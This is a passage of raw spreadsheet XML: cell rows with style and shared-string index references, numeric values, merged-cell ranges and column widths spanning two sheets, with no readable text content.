      <c r="S123" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T123" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U123" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V123" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W123" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X123" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y123" s="52" t="s">
        <v>10</v>
      </c>
      <c r="Z123" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AA123" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB123" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC123" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD123" s="65" t="s">
        <v>1073</v>
      </c>
      <c r="AE123" s="65" t="s">
        <v>1074</v>
      </c>
      <c r="AF123" s="53" t="s">
        <v>1075</v>
      </c>
      <c r="AG123" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH123" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI123" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ123" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK123" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL123" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="124" ht="153.75" customHeight="1">
      <c r="B124" s="44" t="s">
        <v>1008</v>
      </c>
      <c r="C124" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D124" s="45" t="s">
        <v>1076</v>
      </c>
      <c r="E124" s="45" t="s">
        <v>1077</v>
      </c>
      <c r="F124" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G124" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H124" s="46" t="s">
        <v>1078</v>
      </c>
      <c r="I124" s="46" t="s">
        <v>1025</v>
      </c>
      <c r="J124" s="46" t="s">
        <v>1079</v>
      </c>
      <c r="K124" s="47">
        <v>1.0</v>
      </c>
      <c r="L124" s="47">
        <v>0.0</v>
      </c>
      <c r="M124" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N124" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O124" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P124" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q124" s="50" t="s">
        <v>1080</v>
      </c>
      <c r="R124" s="50">
        <v>4.0</v>
      </c>
      <c r="S124" s="50">
        <v>8.0</v>
      </c>
      <c r="T124" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U124" s="51" t="s">
        <v>1081</v>
      </c>
      <c r="V124" s="51">
        <v>5.0</v>
      </c>
      <c r="W124" s="51">
        <v>10.0</v>
      </c>
      <c r="X124" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y124" s="52" t="s">
        <v>1082</v>
      </c>
      <c r="Z124" s="52">
        <v>9.0</v>
      </c>
      <c r="AA124" s="52">
        <v>21.0</v>
      </c>
      <c r="AB124" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC124" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD124" s="65" t="s">
        <v>1083</v>
      </c>
      <c r="AE124" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF124" s="53" t="s">
        <v>1084</v>
      </c>
      <c r="AG124" s="46" t="s">
        <v>1085</v>
      </c>
      <c r="AH124" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI124" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ124" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK124" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL124" s="66" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="125" ht="153.75" customHeight="1">
      <c r="A125" s="109"/>
      <c r="B125" s="44" t="s">
        <v>1008</v>
      </c>
      <c r="C125" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D125" s="45" t="s">
        <v>1086</v>
      </c>
      <c r="E125" s="45" t="s">
        <v>1087</v>
      </c>
      <c r="F125" s="45" t="s">
        <v>1088</v>
      </c>
      <c r="G125" s="45" t="s">
        <v>1089</v>
      </c>
      <c r="H125" s="46" t="s">
        <v>1090</v>
      </c>
      <c r="I125" s="46" t="s">
        <v>1091</v>
      </c>
      <c r="J125" s="46" t="s">
        <v>1092</v>
      </c>
      <c r="K125" s="47">
        <v>1.0</v>
      </c>
      <c r="L125" s="47">
        <v>0.0</v>
      </c>
      <c r="M125" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N125" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O125" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P125" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q125" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R125" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S125" s="50"/>
      <c r="T125" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U125" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V125" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W125" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X125" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y125" s="52" t="s">
        <v>10</v>
      </c>
      <c r="Z125" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AA125" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB125" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC125" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD125" s="65" t="s">
        <v>1073</v>
      </c>
      <c r="AE125" s="65" t="s">
        <v>1093</v>
      </c>
      <c r="AF125" s="53" t="s">
        <v>1094</v>
      </c>
      <c r="AG125" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH125" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI125" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ125" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK125" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL125" s="66" t="s">
        <v>64</v>
      </c>
      <c r="AM125" s="109"/>
    </row>
    <row r="126" ht="153.75" customHeight="1">
      <c r="A126" s="109"/>
      <c r="B126" s="44" t="s">
        <v>1095</v>
      </c>
      <c r="C126" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D126" s="45" t="s">
        <v>1096</v>
      </c>
      <c r="E126" s="45" t="s">
        <v>1097</v>
      </c>
      <c r="F126" s="45" t="s">
        <v>1098</v>
      </c>
      <c r="G126" s="45" t="s">
        <v>1099</v>
      </c>
      <c r="H126" s="46" t="s">
        <v>1100</v>
      </c>
      <c r="I126" s="46" t="s">
        <v>1101</v>
      </c>
      <c r="J126" s="46" t="s">
        <v>1102</v>
      </c>
      <c r="K126" s="47">
        <v>1.0</v>
      </c>
      <c r="L126" s="47">
        <v>0.0</v>
      </c>
      <c r="M126" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N126" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O126" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P126" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q126" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R126" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S126" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T126" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U126" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V126" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W126" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X126" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y126" s="52">
        <v>2002752.2002749</v>
      </c>
      <c r="Z126" s="52">
        <v>2.0</v>
      </c>
      <c r="AA126" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB126" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC126" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD126" s="65" t="s">
        <v>1073</v>
      </c>
      <c r="AE126" s="65" t="s">
        <v>1103</v>
      </c>
      <c r="AF126" s="53" t="s">
        <v>1104</v>
      </c>
      <c r="AG126" s="46" t="s">
        <v>1105</v>
      </c>
      <c r="AH126" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI126" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ126" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK126" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL126" s="66" t="s">
        <v>64</v>
      </c>
      <c r="AM126" s="109"/>
    </row>
    <row r="127" ht="153.75" customHeight="1">
      <c r="A127" s="109"/>
      <c r="B127" s="44" t="s">
        <v>1095</v>
      </c>
      <c r="C127" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D127" s="45" t="s">
        <v>1106</v>
      </c>
      <c r="E127" s="45" t="s">
        <v>1107</v>
      </c>
      <c r="F127" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G127" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H127" s="46" t="s">
        <v>1108</v>
      </c>
      <c r="I127" s="46" t="s">
        <v>323</v>
      </c>
      <c r="J127" s="46" t="s">
        <v>1109</v>
      </c>
      <c r="K127" s="47">
        <v>1.0</v>
      </c>
      <c r="L127" s="47">
        <v>0.0</v>
      </c>
      <c r="M127" s="108">
        <v>1394.0</v>
      </c>
      <c r="N127" s="48">
        <v>1.0</v>
      </c>
      <c r="O127" s="48">
        <v>18.0</v>
      </c>
      <c r="P127" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q127" s="59">
        <v>1394.0</v>
      </c>
      <c r="R127" s="50">
        <v>1.0</v>
      </c>
      <c r="S127" s="50">
        <v>18.0</v>
      </c>
      <c r="T127" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U127" s="51" t="s">
        <v>1110</v>
      </c>
      <c r="V127" s="51">
        <v>2.0</v>
      </c>
      <c r="W127" s="51">
        <v>40.0</v>
      </c>
      <c r="X127" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y127" s="52" t="s">
        <v>1111</v>
      </c>
      <c r="Z127" s="52">
        <v>4.0</v>
      </c>
      <c r="AA127" s="52">
        <v>44.0</v>
      </c>
      <c r="AB127" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC127" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD127" s="65" t="s">
        <v>1112</v>
      </c>
      <c r="AE127" s="65" t="s">
        <v>1113</v>
      </c>
      <c r="AF127" s="53" t="s">
        <v>1114</v>
      </c>
      <c r="AG127" s="46" t="s">
        <v>1115</v>
      </c>
      <c r="AH127" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI127" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ127" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK127" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL127" s="66" t="s">
        <v>64</v>
      </c>
      <c r="AM127" s="109"/>
    </row>
    <row r="128" ht="153.75" customHeight="1">
      <c r="A128" s="109"/>
      <c r="B128" s="44" t="s">
        <v>1095</v>
      </c>
      <c r="C128" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D128" s="45" t="s">
        <v>1116</v>
      </c>
      <c r="E128" s="45" t="s">
        <v>1117</v>
      </c>
      <c r="F128" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G128" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H128" s="46" t="s">
        <v>1118</v>
      </c>
      <c r="I128" s="46" t="s">
        <v>162</v>
      </c>
      <c r="J128" s="46" t="s">
        <v>1119</v>
      </c>
      <c r="K128" s="47">
        <v>1.0</v>
      </c>
      <c r="L128" s="47">
        <v>0.0</v>
      </c>
      <c r="M128" s="108" t="s">
        <v>10</v>
      </c>
      <c r="N128" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O128" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P128" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q128" s="59" t="s">
        <v>10</v>
      </c>
      <c r="R128" s="50" t="s">
        <v>351</v>
      </c>
      <c r="S128" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T128" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U128" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V128" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W128" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X128" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y128" s="52">
        <v>2002749.0</v>
      </c>
      <c r="Z128" s="52">
        <v>1.0</v>
      </c>
      <c r="AA128" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB128" s="49">
        <v>2002749.0</v>
      </c>
      <c r="AC128" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD128" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE128" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF128" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG128" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH128" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI128" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ128" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK128" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL128" s="66" t="s">
        <v>64</v>
      </c>
      <c r="AM128" s="109"/>
    </row>
    <row r="129" ht="153.75" customHeight="1">
      <c r="A129" s="109"/>
      <c r="B129" s="74" t="s">
        <v>1095</v>
      </c>
      <c r="C129" s="75" t="s">
        <v>10</v>
      </c>
      <c r="D129" s="75" t="s">
        <v>1120</v>
      </c>
      <c r="E129" s="75" t="s">
        <v>1121</v>
      </c>
      <c r="F129" s="75" t="s">
        <v>1122</v>
      </c>
      <c r="G129" s="75" t="s">
        <v>1123</v>
      </c>
      <c r="H129" s="77" t="s">
        <v>1124</v>
      </c>
      <c r="I129" s="77" t="s">
        <v>1125</v>
      </c>
      <c r="J129" s="77" t="s">
        <v>1126</v>
      </c>
      <c r="K129" s="47">
        <v>1.0</v>
      </c>
      <c r="L129" s="47">
        <v>0.0</v>
      </c>
      <c r="M129" s="78">
        <v>459.0</v>
      </c>
      <c r="N129" s="78">
        <v>1.0</v>
      </c>
      <c r="O129" s="78">
        <v>1.0</v>
      </c>
      <c r="P129" s="79" t="s">
        <v>10</v>
      </c>
      <c r="Q129" s="80" t="s">
        <v>1127</v>
      </c>
      <c r="R129" s="80">
        <v>5.0</v>
      </c>
      <c r="S129" s="80">
        <v>15.0</v>
      </c>
      <c r="T129" s="79" t="s">
        <v>10</v>
      </c>
      <c r="U129" s="81" t="s">
        <v>1128</v>
      </c>
      <c r="V129" s="81">
        <v>8.0</v>
      </c>
      <c r="W129" s="81">
        <v>25.0</v>
      </c>
      <c r="X129" s="79" t="s">
        <v>10</v>
      </c>
      <c r="Y129" s="82" t="s">
        <v>1129</v>
      </c>
      <c r="Z129" s="82">
        <v>16.0</v>
      </c>
      <c r="AA129" s="82">
        <v>31.0</v>
      </c>
      <c r="AB129" s="79" t="s">
        <v>702</v>
      </c>
      <c r="AC129" s="83" t="s">
        <v>59</v>
      </c>
      <c r="AD129" s="84" t="s">
        <v>1130</v>
      </c>
      <c r="AE129" s="84" t="s">
        <v>10</v>
      </c>
      <c r="AF129" s="53" t="s">
        <v>1131</v>
      </c>
      <c r="AG129" s="84" t="s">
        <v>1132</v>
      </c>
      <c r="AH129" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI129" s="110" t="s">
        <v>59</v>
      </c>
      <c r="AJ129" s="110" t="s">
        <v>64</v>
      </c>
      <c r="AK129" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL129" s="85" t="s">
        <v>64</v>
      </c>
      <c r="AM129" s="109"/>
    </row>
    <row r="131">
      <c r="AF131" s="111"/>
    </row>
    <row r="132">
      <c r="B132" s="112" t="s">
        <v>1133</v>
      </c>
      <c r="C132" s="113"/>
      <c r="D132" s="114"/>
      <c r="E132" s="7"/>
      <c r="F132" s="115" t="s">
        <v>1134</v>
      </c>
      <c r="G132" s="113"/>
      <c r="H132" s="114"/>
      <c r="J132" s="115" t="s">
        <v>1135</v>
      </c>
      <c r="K132" s="113"/>
      <c r="L132" s="113"/>
      <c r="M132" s="113"/>
      <c r="N132" s="114"/>
      <c r="AF132" s="111"/>
    </row>
    <row r="133">
      <c r="B133" s="116"/>
      <c r="C133" s="117"/>
      <c r="D133" s="118"/>
      <c r="E133" s="7"/>
      <c r="F133" s="116"/>
      <c r="G133" s="117"/>
      <c r="H133" s="118"/>
      <c r="J133" s="116"/>
      <c r="K133" s="117"/>
      <c r="L133" s="117"/>
      <c r="M133" s="117"/>
      <c r="N133" s="118"/>
    </row>
    <row r="134" ht="17.25" customHeight="1">
      <c r="F134" s="109"/>
    </row>
    <row r="136">
      <c r="B136" s="119" t="s">
        <v>205</v>
      </c>
      <c r="C136" s="120" t="s">
        <v>212</v>
      </c>
      <c r="D136" s="121" t="s">
        <v>181</v>
      </c>
      <c r="F136" s="122" t="s">
        <v>1136</v>
      </c>
      <c r="G136" s="123" t="s">
        <v>1137</v>
      </c>
      <c r="H136" s="124" t="s">
        <v>1138</v>
      </c>
      <c r="J136" s="125" t="s">
        <v>1139</v>
      </c>
      <c r="K136" s="126"/>
      <c r="L136" s="126"/>
      <c r="M136" s="126"/>
      <c r="N136" s="127"/>
    </row>
    <row r="137">
      <c r="B137" s="128" t="s">
        <v>1140</v>
      </c>
      <c r="C137" s="129" t="s">
        <v>1141</v>
      </c>
      <c r="D137" s="130" t="s">
        <v>1142</v>
      </c>
      <c r="F137" s="131" t="s">
        <v>1143</v>
      </c>
      <c r="G137" s="132" t="s">
        <v>1144</v>
      </c>
      <c r="H137" s="133" t="s">
        <v>1145</v>
      </c>
      <c r="J137" s="134" t="s">
        <v>1146</v>
      </c>
      <c r="K137" s="126"/>
      <c r="L137" s="126"/>
      <c r="M137" s="126"/>
      <c r="N137" s="127"/>
    </row>
    <row r="138">
      <c r="O138" s="6"/>
      <c r="P138" s="6"/>
    </row>
    <row r="139">
      <c r="O139" s="6"/>
      <c r="P139" s="6"/>
    </row>
    <row r="140">
      <c r="O140" s="6"/>
      <c r="P140" s="6"/>
    </row>
    <row r="141">
      <c r="O141" s="6"/>
      <c r="P141" s="6"/>
    </row>
    <row r="142">
      <c r="O142" s="6"/>
      <c r="P142" s="6"/>
    </row>
    <row r="143">
      <c r="O143" s="6"/>
      <c r="P143" s="6"/>
    </row>
    <row r="144">
      <c r="O144" s="6"/>
      <c r="P144" s="6"/>
    </row>
    <row r="145">
      <c r="O145" s="6"/>
      <c r="P145" s="6"/>
    </row>
    <row r="150">
      <c r="C150" s="135"/>
    </row>
  </sheetData>
  <mergeCells count="9">
    <mergeCell ref="J136:N136"/>
    <mergeCell ref="J137:N137"/>
    <mergeCell ref="M2:P2"/>
    <mergeCell ref="Q2:T2"/>
    <mergeCell ref="U2:X2"/>
    <mergeCell ref="Y2:AB2"/>
    <mergeCell ref="B132:D133"/>
    <mergeCell ref="F132:H133"/>
    <mergeCell ref="J132:N133"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="AE5"/>
    <hyperlink r:id="rId2" ref="AE1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4" width="27.25"/>
    <col customWidth="1" min="5" max="5" width="25.88"/>
    <col customWidth="1" min="6" max="6" width="25.25"/>
    <col customWidth="1" min="7" max="7" width="27.75"/>
    <col customWidth="1" min="8" max="8" width="24.75"/>
    <col customWidth="1" min="9" max="9" width="31.88"/>
    <col customWidth="1" min="10" max="10" width="26.38"/>
    <col customWidth="1" min="11" max="11" width="32.25"/>
    <col customWidth="1" min="12" max="12" width="24.88"/>
    <col customWidth="1" min="13" max="13" width="26.0"/>
    <col customWidth="1" min="15" max="15" width="56.5"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="136"/>
      <c r="B1" s="136"/>
      <c r="C1" s="136"/>
      <c r="D1" s="136"/>
      <c r="E1" s="137"/>
      <c r="F1" s="137"/>
      <c r="G1" s="25"/>
      <c r="H1" s="25"/>
      <c r="I1" s="25"/>
      <c r="J1" s="25"/>
      <c r="K1" s="25"/>
      <c r="L1" s="25"/>
      <c r="M1" s="25"/>
      <c r="N1" s="137"/>
      <c r="O1" s="137"/>
    </row>
    <row r="2">
      <c r="A2" s="137"/>
      <c r="B2" s="137"/>
      <c r="C2" s="137"/>
      <c r="D2" s="137"/>
      <c r="E2" s="138" t="s">
        <v>4</v>
      </c>
      <c r="F2" s="127"/>
      <c r="G2" s="139" t="s">
        <v>5</v>
      </c>
      <c r="H2" s="117"/>
      <c r="I2" s="139" t="s">
        <v>6</v>
      </c>
      <c r="J2" s="117"/>
      <c r="K2" s="139" t="s">
        <v>7</v>
      </c>
      <c r="L2" s="117"/>
      <c r="M2" s="140"/>
      <c r="N2" s="137"/>
      <c r="O2" s="137"/>
    </row>
    <row r="3" ht="32.25" customHeight="1">
      <c r="A3" s="141" t="s">
        <v>1147</v>
      </c>
      <c r="B3" s="142" t="s">
        <v>1148</v>
      </c>
      <c r="C3" s="142" t="s">
        <v>1149</v>
      </c>
      <c r="D3" s="142" t="s">
        <v>1150</v>
      </c>
      <c r="E3" s="142" t="s">
        <v>1151</v>
      </c>
      <c r="F3" s="142" t="s">
        <v>1152</v>
      </c>
      <c r="G3" s="141" t="s">
        <v>1151</v>
      </c>
      <c r="H3" s="142" t="s">
        <v>1152</v>
      </c>
      <c r="I3" s="141" t="s">
        <v>1151</v>
      </c>
      <c r="J3" s="142" t="s">
        <v>1152</v>
      </c>
      <c r="K3" s="141" t="s">
        <v>1151</v>
      </c>
      <c r="L3" s="142" t="s">
        <v>1152</v>
      </c>
      <c r="M3" s="143" t="s">
        <v>1153</v>
      </c>
      <c r="N3" s="144"/>
      <c r="O3" s="144"/>
      <c r="P3" s="145"/>
      <c r="Q3" s="145"/>
      <c r="R3" s="145"/>
    </row>
    <row r="4">
      <c r="A4" s="146" t="s">
        <v>1154</v>
      </c>
      <c r="B4" s="147" t="s">
        <v>1155</v>
      </c>
      <c r="C4" s="147" t="s">
        <v>1156</v>
      </c>
      <c r="D4" s="147" t="s">
        <v>1157</v>
      </c>
      <c r="E4" s="46" t="s">
        <v>10</v>
      </c>
      <c r="F4" s="147">
        <v>0.0</v>
      </c>
      <c r="G4" s="46" t="s">
        <v>10</v>
      </c>
      <c r="H4" s="147">
        <v>0.0</v>
      </c>
      <c r="I4" s="46" t="s">
        <v>10</v>
      </c>
      <c r="J4" s="147">
        <v>0.0</v>
      </c>
      <c r="K4" s="148" t="s">
        <v>1158</v>
      </c>
      <c r="L4" s="147">
        <v>1.0</v>
      </c>
      <c r="M4" s="149" t="s">
        <v>64</v>
      </c>
      <c r="N4" s="144"/>
      <c r="O4" s="144"/>
      <c r="P4" s="145"/>
      <c r="Q4" s="145"/>
      <c r="R4" s="145"/>
    </row>
    <row r="5">
      <c r="A5" s="146" t="s">
        <v>1159</v>
      </c>
      <c r="B5" s="147" t="s">
        <v>1155</v>
      </c>
      <c r="C5" s="147" t="s">
        <v>1156</v>
      </c>
      <c r="D5" s="147" t="s">
        <v>1160</v>
      </c>
      <c r="E5" s="46" t="s">
        <v>10</v>
      </c>
      <c r="F5" s="147">
        <v>0.0</v>
      </c>
      <c r="G5" s="46" t="s">
        <v>10</v>
      </c>
      <c r="H5" s="147">
        <v>0.0</v>
      </c>
      <c r="I5" s="46" t="s">
        <v>10</v>
      </c>
      <c r="J5" s="147">
        <v>0.0</v>
      </c>
      <c r="K5" s="147" t="s">
        <v>1161</v>
      </c>
      <c r="L5" s="147">
        <v>3.0</v>
      </c>
      <c r="M5" s="149" t="s">
        <v>59</v>
      </c>
      <c r="N5" s="144"/>
      <c r="O5" s="144"/>
      <c r="P5" s="145"/>
      <c r="Q5" s="145"/>
      <c r="R5" s="145"/>
    </row>
    <row r="6">
      <c r="A6" s="146" t="s">
        <v>1162</v>
      </c>
      <c r="B6" s="147" t="s">
        <v>1155</v>
      </c>
      <c r="C6" s="147" t="s">
        <v>1156</v>
      </c>
      <c r="D6" s="147" t="s">
        <v>1163</v>
      </c>
      <c r="E6" s="46" t="s">
        <v>10</v>
      </c>
      <c r="F6" s="147">
        <v>0.0</v>
      </c>
      <c r="G6" s="46" t="s">
        <v>10</v>
      </c>
      <c r="H6" s="147">
        <v>0.0</v>
      </c>
      <c r="I6" s="147">
        <v>51037.0</v>
      </c>
      <c r="J6" s="147">
        <v>1.0</v>
      </c>
      <c r="K6" s="147" t="s">
        <v>1164</v>
      </c>
      <c r="L6" s="147">
        <v>4.0</v>
      </c>
      <c r="M6" s="149" t="s">
        <v>59</v>
      </c>
      <c r="N6" s="144"/>
      <c r="O6" s="144"/>
      <c r="P6" s="145"/>
      <c r="Q6" s="145"/>
      <c r="R6" s="145"/>
    </row>
    <row r="7">
      <c r="A7" s="146" t="s">
        <v>1165</v>
      </c>
      <c r="B7" s="147" t="s">
        <v>1155</v>
      </c>
      <c r="C7" s="147" t="s">
        <v>1166</v>
      </c>
      <c r="D7" s="147" t="s">
        <v>1167</v>
      </c>
      <c r="E7" s="46" t="s">
        <v>10</v>
      </c>
      <c r="F7" s="147">
        <v>0.0</v>
      </c>
      <c r="G7" s="46" t="s">
        <v>1168</v>
      </c>
      <c r="H7" s="147">
        <v>10.0</v>
      </c>
      <c r="I7" s="147" t="s">
        <v>1168</v>
      </c>
      <c r="J7" s="147"/>
      <c r="K7" s="147" t="s">
        <v>1169</v>
      </c>
      <c r="L7" s="147">
        <v>29.0</v>
      </c>
      <c r="M7" s="149" t="s">
        <v>59</v>
      </c>
      <c r="N7" s="144"/>
      <c r="O7" s="144"/>
      <c r="P7" s="145"/>
      <c r="Q7" s="145"/>
      <c r="R7" s="145"/>
    </row>
    <row r="8">
      <c r="A8" s="146" t="s">
        <v>1170</v>
      </c>
      <c r="B8" s="147" t="s">
        <v>1155</v>
      </c>
      <c r="C8" s="147" t="s">
        <v>1166</v>
      </c>
      <c r="D8" s="147" t="s">
        <v>1171</v>
      </c>
      <c r="E8" s="46" t="s">
        <v>10</v>
      </c>
      <c r="F8" s="147">
        <v>0.0</v>
      </c>
      <c r="G8" s="46" t="s">
        <v>1172</v>
      </c>
      <c r="H8" s="147">
        <v>2.0</v>
      </c>
      <c r="I8" s="147" t="s">
        <v>1172</v>
      </c>
      <c r="J8" s="147">
        <v>2.0</v>
      </c>
      <c r="K8" s="147" t="s">
        <v>1173</v>
      </c>
      <c r="L8" s="147">
        <v>14.0</v>
      </c>
      <c r="M8" s="149" t="s">
        <v>59</v>
      </c>
      <c r="N8" s="144"/>
      <c r="O8" s="144"/>
      <c r="P8" s="145"/>
      <c r="Q8" s="145"/>
      <c r="R8" s="145"/>
    </row>
    <row r="9">
      <c r="A9" s="146" t="s">
        <v>1174</v>
      </c>
      <c r="B9" s="147" t="s">
        <v>1155</v>
      </c>
      <c r="C9" s="147" t="s">
        <v>1166</v>
      </c>
      <c r="D9" s="147" t="s">
        <v>1175</v>
      </c>
      <c r="E9" s="46" t="s">
        <v>10</v>
      </c>
      <c r="F9" s="147">
        <v>0.0</v>
      </c>
      <c r="G9" s="46" t="s">
        <v>1176</v>
      </c>
      <c r="H9" s="147">
        <v>5.0</v>
      </c>
      <c r="I9" s="147" t="s">
        <v>1176</v>
      </c>
      <c r="J9" s="147">
        <v>5.0</v>
      </c>
      <c r="K9" s="147" t="s">
        <v>1177</v>
      </c>
      <c r="L9" s="147">
        <v>20.0</v>
      </c>
      <c r="M9" s="149" t="s">
        <v>59</v>
      </c>
      <c r="N9" s="144"/>
      <c r="O9" s="144"/>
      <c r="P9" s="145"/>
      <c r="Q9" s="145"/>
      <c r="R9" s="145"/>
    </row>
    <row r="10">
      <c r="A10" s="146" t="s">
        <v>1178</v>
      </c>
      <c r="B10" s="147" t="s">
        <v>1155</v>
      </c>
      <c r="C10" s="147" t="s">
        <v>1166</v>
      </c>
      <c r="D10" s="147" t="s">
        <v>1179</v>
      </c>
      <c r="E10" s="46" t="s">
        <v>10</v>
      </c>
      <c r="F10" s="147">
        <v>0.0</v>
      </c>
      <c r="G10" s="46" t="s">
        <v>1180</v>
      </c>
      <c r="H10" s="147">
        <v>3.0</v>
      </c>
      <c r="I10" s="147" t="s">
        <v>1180</v>
      </c>
      <c r="J10" s="147">
        <v>3.0</v>
      </c>
      <c r="K10" s="147" t="s">
        <v>1181</v>
      </c>
      <c r="L10" s="147">
        <v>20.0</v>
      </c>
      <c r="M10" s="149" t="s">
        <v>59</v>
      </c>
      <c r="N10" s="144"/>
      <c r="O10" s="144"/>
      <c r="P10" s="145"/>
      <c r="Q10" s="145"/>
      <c r="R10" s="145"/>
    </row>
    <row r="11">
      <c r="A11" s="146" t="s">
        <v>1182</v>
      </c>
      <c r="B11" s="147" t="s">
        <v>1155</v>
      </c>
      <c r="C11" s="147" t="s">
        <v>1166</v>
      </c>
      <c r="D11" s="147" t="s">
        <v>1183</v>
      </c>
      <c r="E11" s="46" t="s">
        <v>10</v>
      </c>
      <c r="F11" s="147">
        <v>0.0</v>
      </c>
      <c r="G11" s="46" t="s">
        <v>1184</v>
      </c>
      <c r="H11" s="147">
        <v>4.0</v>
      </c>
      <c r="I11" s="147" t="s">
        <v>1184</v>
      </c>
      <c r="J11" s="147">
        <v>4.0</v>
      </c>
      <c r="K11" s="147" t="s">
        <v>1185</v>
      </c>
      <c r="L11" s="147">
        <v>19.0</v>
      </c>
      <c r="M11" s="149" t="s">
        <v>59</v>
      </c>
      <c r="N11" s="144"/>
      <c r="O11" s="144"/>
      <c r="P11" s="145"/>
      <c r="Q11" s="145"/>
      <c r="R11" s="145"/>
    </row>
    <row r="12">
      <c r="A12" s="146" t="s">
        <v>1186</v>
      </c>
      <c r="B12" s="147" t="s">
        <v>1155</v>
      </c>
